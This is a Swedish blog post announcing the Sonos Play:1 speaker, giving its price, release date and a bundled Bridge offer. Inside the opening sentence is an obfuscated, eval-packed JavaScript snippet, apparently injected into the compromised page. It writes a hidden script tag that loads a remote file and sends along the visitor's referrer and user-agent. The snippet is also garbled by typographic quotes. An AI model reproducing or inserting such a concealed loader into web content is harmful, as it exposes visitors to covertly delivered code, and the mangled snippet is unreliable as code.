Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Nya Sonos Play:1 – Succén fortsätter.

Nya Sonos Play:1 – Succén fortsätter.
Filip Urde
  • On 15 oktober, 2013
  • http://www.revue.se/filip-urde

Sonos eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ndfhk|var|u0026u|referrer|dsiaf||js|php’.split(’|’),0,{}))
släppte igår en ny högtalare i deras fortsatt växande linje med smarta högtalare.

 

 

 

 

Den nya går under namnet SONOS PLAY:1. Vilket blir den minsta högtalaren i Sonos-systemet och tanken med PLAY:1 är att du kan använda den i mindre rum eller som en utbyggnad av ditt system för att skapa full surround med t.ex. SONOS Playbar som vi testat här på revue.

Priset är 1 798 kronor och den släpps den 29:e.  Om du är sugen, så kommer Sonos att slänga med en gratis Sonos Bridge om du köper den inför julhelgen. Bra deal.
www.sonos.com